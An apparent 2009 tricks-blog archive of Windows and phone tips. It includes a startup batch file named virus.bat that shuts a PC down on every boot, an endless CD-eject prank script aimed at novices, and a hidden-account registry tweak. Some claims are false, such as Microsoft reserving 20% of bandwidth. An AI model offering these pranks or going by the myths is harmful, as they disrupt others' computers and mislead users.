Saturday, May 30, 2009

Shutdown and Restart Trick !


****************************************************************************
Shutdown Trick
Stimulate shutdown from command prompt !
# Start >> Run
# Type shutdown -s -t 10 -c "Shutting Down..."
# Hit Enter and enjoy !
****************************************************************************
Restart Trick
Stimulate Restart from command prompt !
# Start >> Run
# Type shutdown -r -t 10 -c "Restarting..."
# Hit Enter and enjoy !
****************************************************************************
Log Off Trick
Stimulate LogOff from command prompt !
# Start >> Run
# Type shutdown -l
# Hit Enter and enjoy !
****************************************************************************

Please Note
-s :: This signify Shutdown Request.
-r :: This signify Restart Request.
-l :: This signify LogOff Request.
-t :: This signify the timer before Restart. (Replace '10' with any number.)
-c :: This signify comment.

How To Stop It ?
# When the timer is Running...
# Start >> Run
# Type shutdown -a
# That's It.

Prank !!!

-------------------------------------------------------------

۩ We can make a batch file which will Shutdown the computer everytime on startup !

Here is how ?

► Open Notepad

► Type :

@ECHO OFF

shutdown -s -t 10 -c "Virus Attack..."

exit

► File >> Save As...

► Name it : virus.bat

► Start >> All Programs

► Right Click on Startup >> Open

► This open the Startup folder

► Paste the Virus.bat file here !

*** That's all , now the computer will automatically shutdown on every startup !

---------------------------------------------------------------------------------

Eject Your CD-DVD Drives... Infinitely





Enough of Computer Tricks here...
Hm... lets try some Pranks on the Novice and Rookies.. what say?
So... here comes my another Exclusive...!

Eject your drives in and out infinitely...

A simle VB Script will serve the purpose......!!!

Do the following:
** Go to Start >> Run
** Type Notepad and hit Enter
** Now in Notepad type:

Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If

** Go to File >> Save As...
** Type Eject.vbs and click Save

How to use:
$ Just Double Click the saved file ! (Eject.vbs)

How To Stop:
$ First Way:
Restart the Computer... and this will stop the script
$ Second Way:
Open Task Manager and in processes search for wscript.exe and click End Process

Friday, May 29, 2009

Disable unwanted programs at startup

You probably need only half the programs that have been set to be loaded at startup. Having too many programs drastically slows down your startup. It’s very easy to specify which ones you want to start automatically. It’s wise to leave all the anti virus and system tools.
Here’s what you need to do:

Go to Run from the Start menu
Open “msconfig” (without the quotes!) and click OK
In the windows that opens, choose the Startup tab
Make your choices by unchecking the programs you don’t need to load at startup
Hit OK and restart …

10 Tricks With A USB Thumb Drive

Any ordinary USB memory device can do a lot more than you probably thought it could. It can carry programs, encryption and even a full installation of Windows XP! Here is our tenlist for the coolest things you can do with a USB thumb drive:

Take your programs with you

We all know how frustrating it is when we take your files to another computer just to discover that the software required to read the files is not installed.

Here’s the simplest solution - take your programs with you - on your USB thumb drive. Here’s how to do it with Portable Apps:

1. Go to the Portable Apps website and download the installer, choosing the software you want to carry along.

2. Run the installer and install the software to the root of your USB thumb drive.

And you’re done! As soon as you connect your thumb drive into a computer, Portable Apps will open up automatically.

Surf anonymously

With Portable Apps and Firefox, you can surf the web without leaving any trace on the computer you are using. If you want extra security, install a Firefox security plugin such as FoxyProxy. To iput Firefox onto the drive, just copy-paste the Firefox folder from you computer, or install Firefox onto the thumb drive.

Set a program to run automatically (autorun)

Using autorun, you can set a program to start up automatically when you connect the drive to a computer. You can also use the same script for a data CD-ROM. Note that some computers have autorun disabled for security purposes. [Here's how to disable autorun.]

Open up notepad and paste the following script:

[autorun]

ShellExecute=filename

Label=description

UseAutoPlay=1

Make sure you replace filename with the full path to the file. For example, a file called program.exe in a folder called “programs” on the thumb drive would be /programs/program.exe

Replace description with a short description of the program, for example, My Jukebox or Mozilla Firefox.

Save the file as autorun.inf, making sure you select “All Programs” from the save menu, not “Text document”!

Help! I’m lost!

Ever lost a USB drive? Even if you haven’t, there’s a pretty good chance you’ll lose a few during your life. And with all the important information on it, it could be a disaster to have it fall into someone’s hands.

A good idea is to encrypt all the information on the drive, but you would still want it back, wouldn’t you? Luckily, the folks at the Daily Cup Of Tech have come up with a solution.

Save a program called “Help! I’m Lost!” on the drive, that a finder just can’t get around opening. The program opens a message box with your personal “I’m lost” message. It’s a good idea to offer the finder a bigger reward than the drive itself, so that they’ll be interested in contacting you.

Hide the drive inside something

Why not surprise your friends and co-workers by sticking something that looks like a broken USB cable into the computer’s USB drive?

You’ll be sure to get a few shocked faces when you start to play a movie from it.

The guys from Technobuzz.net show us how to do it. (You are gonna need an unbelievably small thumb drive for this…)

Secure your PC

Just like with an RFID badge, you can use a USB drive to lock and unlock a PC. Insert it to begin working and pull it out when you’ve finished, locking the computer. There are several programs for this . Rohos, a commercial program and WiKID, a semi-open source one.

If you really need to secure your computer with a USB drive, I suggest you give Rohos a try, as WiKID is rather complicated.

Portable jukebox

Don’t just carry the music with you, also carry the player! You can install audio programs such as WinAmp and CoolPlayer+ on your thumb drive. Just unextract the ZIP folders to the USB drive.

If you want the jukebox to start up automatically when you connect the memory stick to the computer, use the autorun feature shown tip 3 and point it to the exe of your audio player.

Encrypt your data

If you carry any sensitive indormation on your USB memory stick, a good idea is to encrypt it. Hardware-level encryption will help, but it will cost extra. You can get a free program to encrypt your data just as securely. For this I recommend TrueCrypt, but most others will also do.

You will need admin access on the computer you want to use your encrypted thumb drive on, so this it’s usability a little.

Run a standalone OS for dedicated tasks

The easiest OS to boot from a USB drive is probably Linux. There are many small capacity Linux versions out there that will fit on your drive. The best 3 are Puppy Linux, Damn Small Linux and Webconverger.

Make sure you select a version that needs less space than your USB drive’s maximum, so you have room for files and software.

And this leads us nicely to the final tip…

Run Windows itself from a USB thumb drive
Modifying Windows to work on a USB drive is quite difficult, but luckily there are some tools that will do it for us. Note that you will need a separate Windows license for this, as Microsoft only lets you use one for each single computer, and a USB drive is treated by them like a computer…

What you’ll need:

  1. A licensed copy of Windows
  2. A USB device, min. 1GB (We recommend a USB hard disk, as a flash memory stick will become unusable after 100000 writing processes. Assuming that only 2 processes are used per second, the drive will last only 60 days with 8 hours of work each day… A hard disk doesn’t have this problem.)
Here is the link to the full tutorial, translated from German.

HOW TO REMOVE Drivegaurd.exe or flashgaurd.exe VIRUS

Drivegaurd.exe or flashgaurd.exe

“this worm will remove all files from C:\heap41a that are related to other malicious programs it enables TaskManager if is disabled” - BitDefender

it also download some other malicious files to your computer

You can locate the virus files at c:\Program Files\FlashGuard\FlashGuard.exe
Or you may have to change the attributes of this folder.For that you can refer this guide
c:\Program Files\FlashGuard\FlashGuard.exe
c:\Program Files\FlashGuard\ReadMe.txt
c:\DocumentsandSettings\**UserProfile\LocalSettings\Temp\DriveGuard.tmp.exe
c:\DocumentsandSettings\**UserProfile\LocalSettings\Temp\gHmpg.tmp.exe
It creates folders in your pendrive & copy itself to :
f:\System\Security\DriveGuard.exe *
f:\autorun.inf *
f: is your pen drive so change it according to your pendrive drive.
Will add itself to startup:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\FlashGuard
To see these virus you must set Windows to show hidden files -
HOW TO REMOVE IT :
Press Ctrl+Alt+Del to open ‘Task Manager’, select FlashGuard.exe & click ‘End Process’
You can browse to the folder mentioned above or you can find it quickly by using ‘Search’ feature(Start Menu>>Search). In the search box type, flashguard.exe or flashguard. Don’t hit the search button ..

Scroll down & expand ‘More Advanced Options’.Check the all the box as you see in the screenshot below & hit ‘Search’ button..
Delete all the files found..
Also serch for .tmp.exe, delete DriveGuard.tmp.exe & gHmpg.tmp.exe files…
The virus files can easily be recognized with pendrive icon and delete those files.
Congrats, the virus is removed from your computer. But still some entries made by the virus files exists in registry.
Go to start->run and type msconfig and hit enter
Select ‘Startup’ tab, select & uncheck FlashGuard. Click ‘Apply’.

Delete Registry Entry : Go to Start Menu>>Run, type regedit & click ‘Ok’
Browse to :
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\FlashGuard
Select FlashGuard, right-click on it & delete

SECRET MOBILE CODES

Here is the important codes for the mobile devices.
Note that all codes does not works in all mobile devices.
Most of the given codes are for NOKIA phones.

FOR FORMAT

*#7370#
To Format ur phone (series 60,80)
After entering this code phone will ask LOCK CODE. It is 12345 for NOKIA.
After entering lock code phone will be restarted and phone memory will be deleted.

PLZ REMOVE UR MEMORY CADR BEFORE FORMATING IT

*#7780#
It is same as above code.
But it is for soft format.


(* and 3 and call key and power key at a same time.)

By this code ur phone will be Hard Formated.

FOR WALLET

*#7370925538#
It is for WALLET.
If u forgot ur WALLET CODE than by this code it will be deleted and u than have to enter new code.

GENERAL INFO

*#0000#
It shows software version.

*#06#
It shows IMEI code.

DIFFRENT LOCK STATUS'S

#Pw+1234567890+1#
It shows provider lock status.
Use button "*" to enter p and w and + sign.


#Pw+1234567890+2#
It shows network lock status.


#Pw+1234567890+3#
It shows country lock status.


#Pw+1234567890+4#
It shows sim card lock status.

DIVERTS

*#21#
It shows all calls divert to numbers.

*#30#
It shows private numbers.


*#43#
Shows call waiting status.


*#73#
Repets game scores.


12345
Its a default code of Nokia.

*#2820#
will show Bluetooth device address.

MAKE IMAGES ON INTERNET DANCE

MAKE IMAGES ON INTERNET DANCE.
A Javascript trick that makes all the images on the site your on float and dance around. :]

You can do this to ANY site with images

OPEN UR BROWSER
OPEN AYN SITE THAT CONTAINS IMAGES
Go to the address bar on top where site name is there eg.www.trickscafe.blogspot.com Delete everything that's there and copy and paste the code below into it, press enter and have fun.

javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName("img"); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+ "px"; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+" px"}R++}setInterval('A()',5); void(0);

China Mobile Codes

China Mobile Codes-

Engineering mode: *110*01#
Factory mode: *#987#
Restore factory settings: *#987*99#
Software ver: *#900# or *#800#

make autorun cd

if you want to make a autorun file for that CD you are ready to burn

here is a small trick for u


1) You open notepad
2) now you writ: [autorun]
OPEN=INSTALL\aaa.EXE
ICON=INSTALL\aaa.EXE

Now save it but not as a .txt file but as a aaa.inf file.

But remember! And you also need to rember that it is not all of the setup files there are called '.exe but some are called '.msi

3) Now burn your CD with the autorun aaa.inf file included.

4) Now set the CD in you CD drive and wait for the autorun to begin or if nothing happens just double-click on the CD drive in "This Computer"

HOW TO BACKUP UR REGISTRY KEYS

HOW TO BACKUP UR REGISTRY KEYS
VERY USEFULL TRICK

These are the easy steps on how you can export your registry keys

Click Start, and then click Run.

In the Open box, type regedit, and then click OK.


On the File menu, click Export.


In the Save in box, select the box at the bottom the bottom according to weather you want to export all or only selected branches of the registry.


Next select a location in which to save the backup .reg file. In the File name box, type a file name, and then click Save.


Follow these steps to restore your registry to it's previous state

To restore registry keys that you exported, double-click the .reg file that you saved

CAPSLOCK,NUMLOCK,SCROLL LOCK TRICK

if u manually want to edit states of ur CAPSLOCK,NUMLOCK,SCROLL LOCKyou just need to edit the registry. Start Regedit Go to HKEY_CURRENT_USER \ Control Panel \ KeyboardOpen InitialKeyboardIndicators Change the value to one of the following number
0 - All Keys off
1 - Caps Lock on
2 - Num Lock on
4 - Scroll Lock on
For multiple keys, add their values:
3 - Caps Lock and Num Lock on
5 - Caps Lock and Scroll Lock on
6 - Num Lock and Scroll Lock on
7 - Caps Lock, Num Lock, and Scroll Lock on
Log off and back on again

Making A file of the size you want..

How to make a file of the size you want ?
Let us assume you want to make a file of size 10000kbConvert it to bytes -> 10000*1024 which comes out to be 10240000 bytes
Open calculator (win key+r -> type in calc )
Choose view mode to be Scientific one
Type in 10240000 and convert it to hex it comes out to be 9C4000
Convert this value to 8 digits by padding zeroes to its left
-> so finally it comes out be 009C4000
Open Command Prompt (win key + r -> type in cmd )
Type DEBUG filename.datit'll show file not found error ,ignore itType
RCX -> Enter -> then last four hexadecimal numbers
i.e. 4000 ->EnterType RBX -> Enter -> then first four hexadecimal numbers
i.e. 009C->EnterType W ->EnterType Q ->EnterW stands for write and Q for quitNow check the file you just made by dir command ->dir filename.datUsing the same technique you can make files as big as you wantHere is an image to show how exactly everything can be done

SECRET MOBILE CODES GSM/CDMA

SECRET CODE 4 all GSM mobiles-
activate call waiting:*43#
deactivate call waiting:#43#
display private no:*#30#
IMEI:*#06#
check call divert:*#61

secret codes 4 nokia CDMA:
Name Set: *3001#12345#
Software Version: *#837#
Software Version: *#9999#
CDMA Mode : *#7738#

GET FOLDER OPTIONS BACK

1: Here's how you can get Folder Options back..

1: Open Start menu and from there select Run

2: type gpedit.msc and hit enter

3: now in the Group Policy window, from the left pane, select user configuration->Administrative Tempelates->windows components->Windows Explorer by highlighting it with the mouse cursor..

4: now in the right side you will see an option which says "Removes the Folder Options menu item from the Tools menu"

5: right click on this option and select properties

6: now in the properties under Setting tab, select Disabled and hit OK

You can put shortcuts for shortcuts!!

You can put Keyboard shortcuts for desktop shortcuts.
To do this follow these steps :

1) Right click on the shortcut.
2) Go to properties.
3) Click once on the "Shortcut Key" bar.
4) Press any alphabet that you want to use as Shortcut Key.
5) Press OK Now to open that shortcut,
Press CTRL+ALT+"the alphabet".

ACCESS UR FOLDERS AS "DRIVES"

You can create Virtual Drives in your Computer. Now you can access your Favorite Folders as a drive in My Computer.

What you can do ?
** Access your folders as a Drive !
** Fool 'Computer Beginners' or your 'Friends' (Non-Expert) , as the drive will show Disk Space of the folder's drive so it seems that the disk space has increased !!!

Do The Follwing :
► Start >> Run
► Type cmd and hit Enter
► This will open "Command Prompt"
► Type subst Z: E:\folder and hit Enter key.
→ You can replace Z: with your desired New Drive Letter (Except existing Drive letters)!
→ You can replace E:\folder with the path of your favorite folder !
► Now, type exit

*** This creates a new drive ! When you open this , it will open your folder !!!
*** Isn't it Awesome ?
*** And this is Exclusive at pcremix.blogspot.com !
-------------------------------------------------------------
But a Problem !
۩ On Restart the Virtual Drive Disappears !!!
-------------------------------------------------------------

Solution !
-------------------------------------------------------------
۩ We can make a batch file which will make the drive everytime on startup !
Here is how ?
► Open Notepad
► Type :
@ECHO OFF
subst Z: E:\folder
exit
► File >> Save As...
► Name it : Virtual Drive Emulator.bat
► Start >> All Programs
► Right Click on Startup >> Open
► This open the Startup folder
► Paste the Virtual Drive Emulator.bat file here !
*** That's all , now the drive will automatically be created when ever you start your pc

Creating 3D Window Effect.

You can create a nice 3D effect for your windows
Start Regedit
Go to HKEY_CURRENT_USER \ Control Panel \ Colors
Make sure the following setting are there:
ButtonHilight=128 128 128ButtonShadow=255 255 255

Increase the life of ur dvd rom.

This is an interesting one!!!

This is for those who watch movies on their computer's dvd rom drive!!!
There is a software called dvd idle pro which can really increase the life of your dvd drive. By using the Smart Read-ahead Cache,
DVDIdle saves DVD data which will be played soon onto the hard disk cache or RAM cache, and
then feeds it to DVD player.
This allows the DVD drive to rest.

For example:
a 6X-speed DVD drive will only work for 15 minutes when you are watching a 90 minutes DVD
movie.
here is the link: http://www.dvdidle.com/download/DVDIdlePro59.exe

fact about microphone


Do you know ?

There is an interesting fact about Headphones i.e. they can also be used as a microphone !
Technically :
There is not much difference between the circuits of a Microphone and a Headphone , just the headphone is designed to spread voice and an microphone to capture the voice !

Working :
So if you connect the headphone in the microphone slot of your computer, you could use it as a microphone.
Just speak in the ear buds of the microphone, but please speak a bit loudly to be audible at the other end !

** Remember it is just a temporary solution !

CHANGE STARTUP & SHUTDOWN SOUNDS IN XP

Have you ever felt bugged-up with the Start-up and Shutdown jingle of your Windows XP or Vista ? If yes, here is the solution, now you use any of your favorite voice or music or dialogue as your PC’s shutdown and start up.

It’s a simple 4 step process.

Step 1.

Choose the track which you want to play at start-up and shutdown jingles,

Limitations are

* It should be in .WAV format.
* The size of file should not be large, prefer keeping them within in 1 Mb, otherwise your startup will take a bit longer.

If the file you want to make your start-up or shutdown is not in .WAV format, you can easily convert them using Jet Audio 7, or any other converter.

Step 2.

Now rename these files as “Windows XP Startup.WAV” and “Windows XP Shutdown.WAV” respectively.

Step 3.

Now Go to “C:\WINDOWS\MEDIA”, here you will find files “Windows XP Startup.WAV” and “Windows XP Shutdown.WAV”, move them to some other locations, this step is required for, in case you need to revert back these sounds, else you can ignore this step.

Step 4.

Now the files you have chosen and renamed, just copy-paste or cut paste them in “C:\WINDOWS\MEDIA”, here you go, now you can enjoy the new Start-up and shutdown.



Forgot BIOS Password ?

Do the following :

1. Open the CPU
2. Now, observe the motherboard.
3. You notice a coin like silver Battery(3V).




----------------------------------------- NOTE --------------------------------------------------------
This battery is 24 x 7 power supply for the BIOS, which is used to run the system clock will the main power is off. It also initiates the booting process when power is switched on.
-----------------------------------------------------------------------------------------------------------

4. Remove the battery from the motherboard.
(It is safe to remove the Battery)
5. Wait 30 seconds and place the battery back on the motherboard.
6. Now, when you start your system you won't be prompted for the BIOS password.

Enjoy !!!
------------------------------------ CAUTION -----------------------------------------------
1. Perform on your own risk !
2. You have to set the time of your computer when you start again.
---------------------------------------------------------------------------------------------------

Boost Up Internet Speed Without Using Software




Above 90% computers all over the world run Windows... and hence another computer trick.

FACT
But do you know that about 20% of your internet bandwidth is reserved by Microsoft.
---------------------------------------------------------------------------------------------------------
Uses of Reserved Bandwidth
** Windows Automatic Updates rely on this reserved bandwidth.
** Fast loading Microsoft Websites
** Sending Error Reports
** Online Help support in Microsoft Office
---------------------------------------------------------------------------------------------------------
But this can be recovered back...
---------------------------------------------------------------------------------------------------------
The Remedy
** Start >> Run
** Type gpedit.msc
** This opens the Policy Editor
** Now, Local Computer Policy >> Computer Configuration
** Then, Administrative Templates >> Network
** Now, click on QOS Packet Scheduler
** Now, on Right hand side
** Double Click Limit reservable bandwidth
** Now in Setting Tab


***************************************************
It says : Not Configured
Reality : The Explain Tab says "By default, the Packet Scheduler limits the system to 20 percent of the bandwidth of a connection"

***************************************************

** So, on Setting Tab select Enabled
** Now, change Bandwidth limit (%) to 0 (Zero)
** Click OK !!!


That's All !!!

tricks for nokia users

Turn on/off the "click" sound made by the camera by selecting the 'Silent' profile or by turning warning tones on/off:
Menu > Profiles > "select your activated profile" > Personalise > Warning tones > On/Off.
(This also effects the sound of Java games and apps).

To change background image go to:
Menu > Tools > Settings > Phone > Standby mode > Background image > Yes > "choose an image".
The best size for background images is 174x132 pixels.

Display an image when someone's calling:
Menu > Contacts > "select a contact card" > Options > Edit > Options > Add thumbnail > "choose an image".

Add a personal ringing tone to a contact:
Menu > Contacts > "select a contact card" > Options > Open > Options > Ringing tone > "choose a ringing tone".

Delete all messages from your Inbox at once:
Menu > Messaging > Inbox > Options > Mark/Unmark > Mark all > Options > Delete.

Send or hide your caller ID: Go to: Menu > Tools > Settings > Call > Send My
Caller ID > 'Yes', 'No' or 'Set By Network' to follow the default settings of your home network.

Start movie in Paint!

Start movie in Paint!
* First start a movie in any player.

* Then open Paint.

* Now, in the player when the movie is being played, press "Print screen" button on your key board.

* Now, Press ctrl+v in Paint

* Leave the movie player open and don't minimize it.

* Open Paint now and see the movie in the Paint!

CREATE A HIDDEN USER ACCOUNT

Create A Hidden User Account
This tweak allows an account that is normally displayed on the Welcome screen to be hidden from view. To log on using the account it's necessary to use the Log On To Windows dialog box similar to the one in Windows 2000. #[Start] [Run] [Regedit]#Registry Key:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList#Modify/Create the Value Data Type(s) and Value Name(s) as detailed below.#Data Type: REG_DWORD [Dword Value] // Value Name: Type Name of Account to be Hidden#Setting for Value Data: [0 = Account is Hidden / 1 = Enabled]#Exit Registry and Reboot...

While the account is hidden on the Welcome screen, note that the account profile will be visible in C:\Documents and Settings or wherever user profiles are stored as well as in Local Users and Groups

Thursday, May 28, 2009

RENAME RECYCLE BIN TO WHAT U WANT

1. Start, Run, 'Regedit'.
2. Press 'Ctrl'+'F' to open find box and type 'Recycle Bin' to search.
3. Change any value data with 'Recycle Bin' to whatever name you want to give it ( ie, like 'Trash Can' or 'Dump' etc).
4. Press F3 to continue searching for 'Recycle Bin' and change wherever you come across 'Recycle Bin' to new its new name.
5. Repeat step 4 until you have finished with searching and changed all values to its new name.
6. Close regedit and hit F5 on desktop to see the new name on screen.

Note: As a good practice, always backup your registry before changing anything although changing 'Recycle Bin' name is a simple tweak and doesnt affect anything else.

KEYBOARD SHOUTCUTS FOR INTERNET

CTRL+click (Open links in a new tab in the background)
CTRL+SHIFT+click (Open links in a new tab in the foreground)
CTRL+T (Open a new tab in the foreground)
ALT+ENTER (Open a new tab from the Address bar)
CTRL+Q (Open Quick Tabs - thumbnail view)
CTRL+TAB/CTRL+SHIFT+TAB (Switch between tabs)
CTRL+n (n can be 1-8) (Switch to a specific tab number)
CTRL+9 (Switch to the last tab)
CTRL+W (Close current tab)
ALT+F4 (Close all tabs)
CTRL+ALT+F4 (Close other tabs)

LOCK UR FOLDER (VERY EASY NO SOFTWARE NEEDED )

How to Lock a Folder Using Notepad


1) Consider you want to lock a folder named abcd in your e:\, whose path is e:\abcd

2) Now open the Notepad and type the following

ren abcd abcd.{21EC2020-3AEA-1069-A2DD-08002B30 309D}

3) Where abcd is your folder name. Save the text file as loc.bat in the same drive.

4) Open another new notepad text file and type the following

ren abcd.{21EC2020-3AEA-1069-A2DD-08002B30 309D} caclub

5) Save the text file as unloc.bat in the same drive.
---------
how to use it
---------
1) To lock the caclub folder, simply click the loc.bat and it will transform into control panel icon which is inaccessible.
2) To unlock the folder click the unloc.bat file. Thus the folder will be unlocked and the contents are accessible.

convert ur FAT partition to NTFS

To convert a FAT partition to NTFS, follow the following steps.

Click on Start, click Programs, & then click Command Prompt.

In Windows XP, click Start, & then click Run.


At the command prompt, type CONVERT [driveletter]: /FS:NTFS.

Convert.exe will attempt to convert the partition to NTFS.


NOTE: Although the chance of corruption or data loss during the conversion from FAT to NTFS is minimal, it is best to perform a full backup of the data on the drive that it is to be converted prior to executing the convert command. It is also recommended to verify the integrity of the backup before proceeding, as well as to run RDISK and update the emergency repair disk (ERD).

Different ways to shutdown ur pc

Different ways to shutdown ur pc

There are so many different ways to turn off your Windows XP computer, let's look at some of them:


1. The standard approach - click the Start Button with your mouse, then select the Turn Off menu and finally click the Turn Off icon on the Turn Off computer dialog. blink.gif

2. Press Ctrl+Esc key or the Win key and press u two times - the fastest approach.

3. Get the Shutdown utility from Download.com - it add the shut down shortcuts for you. Else create them yourself using approach 4.

4. Create a shutdown shortcut on your desktop. Right click on the desktop, choose New Shortcut and type shutdown -s -t 00 in the area where you are asked to specify the location of the program file. Now you can just double click this icon to turn off the computer. The best location would be your quick launch bar.

5. Press the Win key + R key to open the run window. Type shutdown -s -t 00. [s means shutdown while t means the duration after which you want to initiate the shutdown process].

If some open processes or application won't let you turn off, append a -f switch to force a shut down by closing all active processes.



6. Win+M to minimize all windows and then Alt+F4 to bring the Turn Off computer dialog.

7. Open Windows Task manager (by right clicking the Windows Task bar or Alt+Ctrl+Del) and choose Shut down from the menu. Useful when the Windows are not responding.


8. open task manager--->click on shutdown--->hold the ctrl key and click on Turn off::::::: pc will be turned off in 3 secs.. fastest method other than hard shutdown

Trick to Show ur name after time in taskbar...

Hi freinds !
I m here to tell u a trick to add up ur name in place of AM and PM beside time and make urself to feel proud among ur group of frnds.
Its simple
Start -> Control Pannel -> Regional and LAnguage option -> Customize (beside English US) -> Go to TIME tab -> Change AM symbol and PM symbol from AM and PM to ur name -> Apply -> Ok ...
IS it changed ??? Might be not ...Now go to time in taskbar and Double Click it to open "Date and time property" ...Look place where time chnges in digital form i.e. 02:47:52 AM , click to arrow to cnage the AM or PM by selecting and press arrow. It will Show ur name or name that was entered by u, Apply -> OK and be HAPPY

MOTOROLA CODES

MOTOROLA Security code:
32*118*1*0*0
model:32*279*1*0*8
master reset: 18*0
master clear:18*1
user code:32*116*1*0*0
read imei:32*4*1*0

Wednesday, May 27, 2009

[HOW TO]Hide partitions without using any software

Go to Start->Run.
Type DISKPART and press Enter.
In the console type list volume to see all the drives available on your PC.
Now select the drive which you want to hide. Suppose you want to hide D see the volume number opposite to Ltr D.
In My PC it is volume 4 for drive D(might be different in [...]

Play your favourite mp3 songs in GTA vc

Ever wanted to play your favourite songs in gta vice city?????
Here is the trick to do that.
There is a folder inside the GTA Vice City game folder called MP3. You can place your own MP3s into this folder.
If u hv installed the game in it’s default location den it’s path wld be
C:\Program Files\Rockstar Games\Grand [...]

Attractive Explorer Background

Change the boring white background of the folders into attractive background like any photo. It looks kool just like this. Isnt it look so kool ?


To do this thing there's a small trick to do in your computer and its so easy, then lets start.

Copy the following to your text editor and save it as desktop.ini in the folder whose background you want to change.

[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
iconarea_image="complete picture location"
iconarea_text=0x00000000 <------- File text color can be set to any value just now its black. 0x00ffffff for white. Run the following command in the command prompt attrib +s "path of the folder" e.g. attrib +s "E:\old download" will change the background of the folder "old download" It would be good to keep the file desktop.ini hidden. So right click on it > go to properties and change its atribute to hidden. Thats it.

Just try it and show the kool looks of your computer to your friends. Isnt it Amazing trick?

System Properties - General Tab

The System Properties dialogue box gives you information about your PC. There's quite a lot of useful areas here, so we'll go through some of them. To bring up System Properties, click Start and then Control Panel. From the Control Panel, double click System. Another way to bring up this box is to right click the My Computer on your desktop. From the menu, select Properties. A keyboard shortcut is to hold down the Windows Logo key in the bottom left of your keyboard. Keep it held down and press your Pause/Break key. You should see something like the following::The first tab of the System Properties box, General, shows you information about your version of Windows. As you can see, this computer is running XP with Service Pack 2 installed. The area at the bottom is just additional information. For the more adventurous amongst you, you change the logo and text below to something of your own. The part you'll be changing is this part:

Here's how.

Navigate to this folder on your hard drive:

C:\WINDOWS\SYSTEM32

Look for a file called oeminfo.ini. Double click this, and it should open up in notepad. Here's what ours looks like:

[general]
Manufacturer =
Home and Learn
Model =
Self-Built
[Support Information]
Line1 =
Phone: 01642 868839
Line2 =
Email: online@homeandlearn.co.uk


You file needs to be set out like the one above. Just leave the parts that have square brackets - [general] and [Support Information]. Then change anything after the equals sign ( = ). We've highlighted in blue the parts that you can change. Add your own text in place of the blue text above.

You don't need any Support Information. But if you only have Line1, then the Support Information button will be unavailable. If you add a Line2, then you'll be able to click the button and see the rest of the text you typed.

To change the image to one of your own, you need an image that is no larger than this:

width = 180 pixels
height = 114 pixels

You can create your own in something like Photoshop or Paint Shop Pro (or even Paint). Then save your work as a BITMAP file (.bmp). But you need to save your work with the following name:

oemlogo.bmp

Once you're happy with your new logo, copy and paste it to the folder you opened above (C:\WINDOWS\SYSTEM32). Launch the System Properties box again to view your work.

Here's another General tab logo we created:

The image was created using a Tube in Paint Shop Pro. Very easy to do! If you'd like to practice with some Bitmap images we created, then download the images below. Change the name of an image to oemlogo.bmp before you copy and paste to your SYSTEM32 folder.

CHANGE WINDOWS TO YOUR NAME

open notepad dump the following lines into it and save it with the name OEMINFO.INI in the c:\windows\system32 directory:

[General]
Manufacturer=Your Name Here
Model=Your Model Here
[Support Information]
Line1=Your Name Here
Line2=Your Address Here
Line3=Your Email Address Here

Save the file, then make a right click on my computer select properties, in the general tab a button will be highlighted (support information) make a click on it, you will be able to see the changes.
Now if you want to display some more information then simply increase the line in the file.

Hidden Programes In Windows

Hidden programs of windows
1- Private Character Editor
This program is for designing icons and Characters(Alphapet )
Click :start
Then :run
type :EUDCEDIT
............ ......... ......... ......... ......... .........
2- iExpress
This Program is for converting your files to EXCUTABLE files
Click : start
Then : run
type : iexpress
............ ......... ......... ......... ......... .........
3-Disk Cleanup
This program used for cleaning harddisk to offer space
Click : start
Then : run
type : cleanmgr
............ ......... ......... ......... ......... .........
4-Dr Watson
This program Is for repairing problems in Windows
Click : start
Then : run
type : drwtsn32
............ ......... ......... ......... ......... .........
5-Windows Media Player 5.1
Opens the old media player
Click : start
Then : run
type : mplay32
............ ......... ......... ......... ......... .........

Program ............ . CODE

Character Map = charmap

DirectX diagnosis = dxdiag

Object Packager = packager

System Monitor = perfmon

Program Manager = progman

Remote Access phone book = rasphone

Registry Editor = regedt32

File siganture verification tool = sigverif

Volume Control = sndvol32

System Configuration Editor = sysedit

Syskey = syskey

microsoft Telnet Client = telnet

Protect Your Folder From Anyone..!!! (even Admin)

Guys, this is a trick in your PC to Prohibit any user (Even Admin OR YOURSELF) to access your Folder....Because not everyone knows this trick.

Our Mission:
We'll lock the folder from all the users... Even your Self, Because we know that not every time though we are admin and we have our personal account....!!!

So, We will prohibit that folder from everone... Even Ourselves. Don't worry we will unlock them too


WARNING: It's better to try on non-usable OR NEW FOLDERS first for newbies


Trick Steps:

1) Go to "Folder Options" > "View" >

There is last option called "Use Simple File Sharing (Recommended)". Remove check from it.... then click "OK".

2) Go to the Properties from which you want to remove access.

3) Go to tab "Security". There are listed "User Names" who can access that folder as written under: "Group OR Usernames"


4) Now, Click on advanced >
remove Check from....
"Inherit from Parent the permissions entries that apply..................."
> Click "Remove."

5) Click OK.

Now, try to access that folder, you will not be able to access it....


Back to Normal:

1) Just Go to Property > Security > Advanced >
& check that option again of
"Inherit from Parent the permissions entries that apply..................."

2) Click OK. Now you should able to access your folder again..

OR you can also add your users only from Property > Security > Advanced > Add > Advanced > Find now > "Select User".....

Tuesday, May 26, 2009

Make Folders Invisible Without Using Any Software



As you can guess with this trick you can make your folders invisible without using any software. This is a very unusual & easy trick to make your private folders invisible to others.


A folder conta
ins two parts; an icon and a name.So to make the folder invisible you will have to make both the icon & the name invisible.

These a
re the steps to do that:
1. For Making The Name Invisible
Select the folder which you want to make invisible. Press F2 key then type ALT+0160 and hit enter key. You w
ill notice that the name of the folder has become invisible. See the snapshot below.









2.For Making The Icon Invisible
